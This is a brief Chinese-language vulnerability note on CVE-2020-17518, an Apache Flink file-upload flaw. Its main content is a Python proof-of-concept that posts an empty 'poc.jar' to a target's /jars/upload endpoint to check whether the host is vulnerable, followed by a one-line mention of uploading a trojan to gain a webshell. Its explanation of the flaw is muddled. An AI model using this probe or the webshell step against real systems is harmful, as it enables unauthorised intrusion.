CVE-2020-17518 Apache Flink 文件上传漏洞

1.描述

• 一个文件上传漏洞
• Apache Flink 1.5.1-1.11.2

2.原理

• 只允许jar文件被上传

3.poc

• poc.py
  • import requests
    ​
    # url = “http://192.168.76.138:8081/jars/upload”
    url = input(“please input upload url:”)
    headers = {
      “Content-Type”: “multipart/form-data; boundary=—————————245590553542791683192777494225”
    }
    data = ”’
    —————————–245590553542791683192777494225
    Content-Disposition: form-data; name=”jarfile”; filename=”poc.jar”
    ​
    —————————–245590553542791683192777494225–
    ”’
    ​
    res = requests.post(url=url,data=data,headers=headers)
    status_code = int(res.status_code)
    content = str(res.content)
    ​
    if (status_code == 200)&(“success” in content):
      print(“‘poc.jar’ upload sucessfully!\nCVE-2020-17518 is exist!”)
    input(“Enter…”)

4.exp

• 利用上传的木马得到webshell